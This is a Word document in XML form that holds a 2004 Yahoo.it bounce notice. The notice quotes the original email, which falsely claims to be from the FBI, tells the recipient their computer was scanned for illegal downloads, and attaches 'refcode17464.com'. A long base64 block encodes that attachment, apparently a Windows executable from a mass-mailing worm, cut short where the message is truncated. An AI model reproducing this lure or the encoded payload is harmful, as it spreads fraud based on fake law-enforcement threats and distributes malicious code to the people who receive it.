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MAILER-DAEMON@yahoo.it</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial" w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> wrote: </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:pBdr>
          <w:left w:val="single" w:sz="12" w:space="4" w:color="1010FF"/>
        </w:pBdr>
        <w:spacing w:before="280" w:after="240"/>
        <w:ind w:left="7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from yahoo.it.</w:t>
        <w:br/>
        <w:t>Unable to deliver message to the following address(es).</w:t>
        <w:br/>
        <w:br/>
        <w:t>:</w:t>
        <w:br/>
        <w:t>This user doesn't have a yahoo.it account (mtgiu83@yahoo.it) [0]</w:t>
        <w:br/>
        <w:br/>
        <w:t>:</w:t>
        <w:br/>
        <w:t>This user doesn't have a yahoo.it account (senzanome@yahoo.it) [-5]</w:t>
        <w:br/>
        <w:br/>
        <w:t>:</w:t>
        <w:br/>
        <w:t>This user doesn't have a yahoo.it account (www.chica_siit@yahoo.it) [0]</w:t>
        <w:br/>
        <w:br/>
        <w:t>--- Original message follows.</w:t>
        <w:br/>
        <w:br/>
        <w:t>The original message is over 5K. Message truncated.</w:t>
        <w:br/>
        <w:br/>
        <w:t>X-YahooFilteredBulk: 81.211.141.152</w:t>
        <w:br/>
        <w:t xml:space="preserve">Return-Path: </w:t>
        <w:br/>
        <w:t>Received: from 81.211.141.152 (EHLO FRESU.it) (81.211.141.152)</w:t>
        <w:br/>
        <w:t>by mta264.mail.scd.yahoo.com with SMTP; Tue, 02 Mar 2004 09:59:48 -0800</w:t>
        <w:br/>
        <w:t>From: jeny_mi@yahoo.it</w:t>
        <w:br/>
        <w:t>To: simoneluc78@yahoo.it</w:t>
        <w:br/>
        <w:t>Subject: Your IP was logged</w:t>
        <w:br/>
        <w:t>X-MailScanner: Analysis clean</w:t>
        <w:br/>
        <w:t>Importance: Normal</w:t>
        <w:br/>
        <w:t>X-Mailer: fworks V3.17</w:t>
        <w:br/>
        <w:t xml:space="preserve">Message-ID: </w:t>
        <w:br/>
        <w:t>MIME-Version: 1.0</w:t>
        <w:br/>
        <w:t>Content-Type: multipart/mixed; boundary="Mime_NextPart"</w:t>
        <w:br/>
        <w:t>This is a multi-part message in MIME format.</w:t>
        <w:br/>
        <w:br/>
        <w:t>--Mime_NextPart</w:t>
        <w:br/>
        <w:br/>
        <w:t>Ladies and Gentlemen,</w:t>
        <w:br/>
        <w:t>Downloading of Movies, MP3s and Software is illegal and punishable by law.</w:t>
        <w:br/>
        <w:br/>
        <w:t>We hereby inform you that your computer was scanned under the IP 195.47.221.65 . The</w:t>
        <w:br/>
        <w:t>contents of your computer were confiscated as an evidence, and you will be indicated.</w:t>
        <w:br/>
        <w:t>In the next days, you'll get the charge in writing.</w:t>
        <w:br/>
        <w:t>In the Reference code: #17464, are all files, that we found on your computer.</w:t>
        <w:br/>
        <w:br/>
        <w:t>The sender address of this mail was masked, to fend off mail bombs.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>- You get more detailed information by the Federal Bureau of Investigation -FBI-</w:t>
        <w:br/>
        <w:t>- Department for "Illegal Internet Downloads", Room 7350</w:t>
        <w:br/>
        <w:t>- 935 Pennsylvania Avenue</w:t>
        <w:br/>
        <w:t>- Washington, DC 20535, USA</w:t>
        <w:br/>
        <w:t>- (202) 324-3000</w:t>
        <w:br/>
        <w:t>--Mime_NextPart</w:t>
        <w:br/>
        <w:t>Content-Type: application/octet-stream; name=refcode17464.com</w:t>
        <w:br/>
        <w:t>Content-Transfer-Encoding: base64</w:t>
        <w:br/>
        <w:t>Content-Disposition: attachment; filename="refcode17464.com"</w:t>
        <w:br/>
        <w:br/>
        <w:t>TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</w:t>
        <w:br/>
        <w:t>AAAAyAAAAAAAAAAAAAAAAAAAAAAAAAAAADczNzI4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</w:t>
        <w:br/>
        <w:t>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</w:t>
        <w:br/>
        <w:t>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABQRQAATAEDAJx54D8AAAAAAAAAAOAADwELAQYA</w:t>
        <w:br/>
        <w:t>ACABAAAQAAAAAAMA0CQEAAAQAwAAMAQAAABAAAAQAAAAAgAABAAAAAEAAAAEAAAAAAAAAABABAAA</w:t>
        <w:br/>
        <w:t>EAAAAAAAAAIAAAAAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAEAyBACcAAAAADAEAEAC</w:t>
        <w:br/>
        <w:t>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</w:t>
        <w:br/>
        <w:t>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</w:t>
        <w:br/>
        <w:t>AAADAAAQAAAAAAAAAAQAAAAAAAAAAAAAAAAAAIAAAOAAAAAAAAAAAAAgAQAAEAMAABgBAAAEAAAA</w:t>
        <w:br/>
        <w:t>AAAAAAAAAAAAAABAAADgLnJzcmMAAAAAEAAAADAEAAAEAAAAHAEAAAAAAAAAAAAAAAAAQAAAw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DAkFClPEPs/tvXX4eAkEAMMUAQAAAAQAJgUADv4h</w:t>
        <w:br/>
        <w:t>opAABQAIAD8KQcwvv80XRg4nABQA3ikmKkEA5pvWtM8BE0AAhT7FzAbbdwvLplkucwyA5XINwMum</w:t>
        <w:br/>
        <w:t>WTYkDrH+hA8waZpBlhA9TbHK0zTNsi8RP1bF1Wmak03XRhJbsMfLphmkzOj0oBOtaZbNIMgUFG3J</w:t>
        <w:br/>
        <w:t>zDbNsjsVfPV3FhYHQZZNM5ejTxdcyLJpmneIlEAYTWWzTTNotQoZRgYeGk2zbJpxxBobcPgFy6Zp</w:t>
        <w:br/>
        <w:t>lhxZzPMSHjlZDtI05fINH0LSNMummAUgMd3qs2yWAzYhjxEiTk3TNE11hZW50jcZpGmWI0tjaIOZ</w:t>
        <w:br/>
        <w:t>TRukiOQ2+UwkmmaQpgZ6f5Sordksm0H6XyW7DCazbJpmZLXwhSeKZjkgTaW5BihrMdMsm8dJKVXX</w:t>
        <w:br/>
        <w:t>AXc0349u/y1XGS4ubzhN62iWFQ+1lrwGy9rLZtk08gsrgSwstJpl0zTT+rwt3Ovt9q9t+C2/FQAQ</w:t>
        <w:br/>
        <w:t>AJowH6EOmGDYsGe2AAEHPTclmzbstg5hMxdpD8BWHVUxNE3TFO4Gw9Ll8QZZDtL2CTIOLEGapmlF</w:t>
        <w:br/>
        <w:t>UWFmaQZpmnmSlKCwG2SQpsna81r/PJg5CC4mAGc41iwvuLo4L1gWId5Oy2bZtOUG9IQ00AU1DDRN</w:t>
        <w:br/>
        <w:t>0zRCS3+gyGaQZdPdEjZXbE2zbJqlrDc3Q2Slls2ANKrYGTg2ZpqmaU2HlLIBJw/58EBC3yBB3jzl</w:t>
        <w:br/>
        <w:t>GHYhlzwIF4E3IGjThjauATBWBI495IptmoYGpMU9X2Bum7YcLj41BkRlPl8ippnkQaQ/QZAJmmXT</w:t>
        <w:br/>
        <w:t>ms7mBvUCPziFid2kaZKfXI8AL3rJnkHYFz8OQGyaQZreBjVr8jNBTTNIs0VHYoCTKYKbNJiMrzRt</w:t>
        <w:br/>
        <w:t>ed44GL8LQhUGJDaANE3TiJiaqrWTfO28Qp8IAAQ1Qy/MDjjIBklFfwYf8jhseexH1AbP4klo0xzY</w:t>
        <w:br/>
        <w:t>zwYOwBJOSMumaZqWBnCxwgNJEDRN0zQsSGdpd4I0zYCEusg8uRz2AC7PKEwCTCgZ0zTXsxNKPgZk</w:t>
        <w:br/>
        <w:t>mQzSNE24xdrf/qYZZNkLSxlZnVQwaZqw5vvv4BO15axOjAYePgBTVsmLaFsnBqgZPwVWJMvlsU/G</w:t>
        <w:br/>
        <w:t>WI9Y0JbLCzl6WHBbVlv4C3JySEFbFACcvJDvxV1PIBqwXRZDa6aDu2QGBkhPYz15xGEmb3AaLmXT</w:t>
        <w:br/>
        <w:t>NE0THgZEUV9vmUGWTbARZh4ssY85jgEMcgFpZ0EfJ9/rONpoP32BbwSB4KQ9sGnewm5p9waEZpCm</w:t>
        <w:br/>
        <w:t>GZCip8scpGma1/H9/09qZpBmuaZswMLOpmmG2Qdt/geUorRsBmmaxtja6iRugzQDsjBAWGkzSNM0</w:t>
        <w:br/>
        <w:t>eYyRp2TTNE2+1e/7AG/NIMvmF31wgocYmmZAlnIdPVFlZpCmaXLm6/A0gyyb/BlzHqy+ZTNI09DV</w:t>
        <w:br/>
        <w:t>9Ap0QZpBmjE2hosO0jTLr3W72N0xdkGapllrd5OYzXJAmujtaXd1kmmWgzSXwnnU5k2zHKTrCnoc</w:t>
        <w:br/>
        <w:t>UGbTDNI0e4CMojlIM0in9/wKe82yGWQhNyx8OFXTNIM0WoGgsjSDNE3E0NXh9wZZDtL8S31igWma</w:t>
        <w:br/>
        <w:t>pmmevc/h7ciyGaTy/hR+GYM0TTNSXnuA0Fk2gzTV4Q9/LxmkaQY8d3yQy0GapqzJzh6AI9I0zSBd</w:t>
        <w:br/>
        <w:t>aXuA0gzSDJ2i8vfIv8kM/F9SQwAAoEFmeXJ5sMRbxBAe+6ZZtqbufvUGBIIWiWyaQZqeo7zqWIPI</w:t>
        <w:br/>
        <w:t>IE2zb5OYmjkgTTOq5PAAhJqmGWQZKklcYaRpmkGgrLzBy6ZpBtjo+g+FM2UzyCA4YKmkTjYnm/yA</w:t>
        <w:br/>
        <w:t>pdNWpqhI05xsK6dd6u+TzXI5WqieqaPnqjnZLJv+zavSzKzs0jTNsgCtFCGVmppl0wyfqzKuPsIz</w:t>
        <w:br/>
        <w:t>yLJpzkqvT7kGaZZNxQ6wcXN/IMumaZThTLFODtI0zaq22t8wsjNIs1wIsxQgWjNIM0hmdo+gTdM0</w:t>
        <w:br/>
        <w:t>TbfH3e39aQzSLJe0rbWv4fi2GWTZ47bo7QO41mmaZmAHKDxQXZtmkKbR1tvnBLmDNIMsCVhd/c0g</w:t>
        <w:br/>
        <w:t>zXsmugcmK363OUjTNMPg5TW7pmkGZDqksMyaYXaQ0SG8lgdfa6QZpGmHjNzhBmmaHRq9TgZCR5fT</w:t>
        <w:br/>
        <w:t>LAdpnBi+JEEzSDNIRpWaqJplM0i60MO/z+yDLAdp8T/AVHPTDNI0hovF0ZDlIE3t8kLBR5pBmmZT</w:t>
        <w:br/>
        <w:t>gaGuwk1zsmn9AsIfO0DNIM0gkJXP21kO0jTt7wvDEJsBaQZgZdg/xBUuFmbuBwE0mIf82jQGQIA/</w:t>
        <w:br/>
        <w:t>TwJDO+FdoKLdFtz/Ij2C0jStVI7FB</w:t>
        <w:br/>
        <w:t>*** MESSAGE TRUNCATED ***</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rStyle w:val="HTMLTypewrit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26:00Z</dcterms:created>
  <dc:creator>defuser</dc:creator>
  <dc:description/>
  <dc:language>en-US</dc:language>
  <cp:lastModifiedBy>defuser</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2004-03-03T11:28:00Z</dcterms:modified>
  <cp:revision>1</cp:revision>
  <dc:subject/>
  <dc:title/>
</cp:coreProperties>
</file>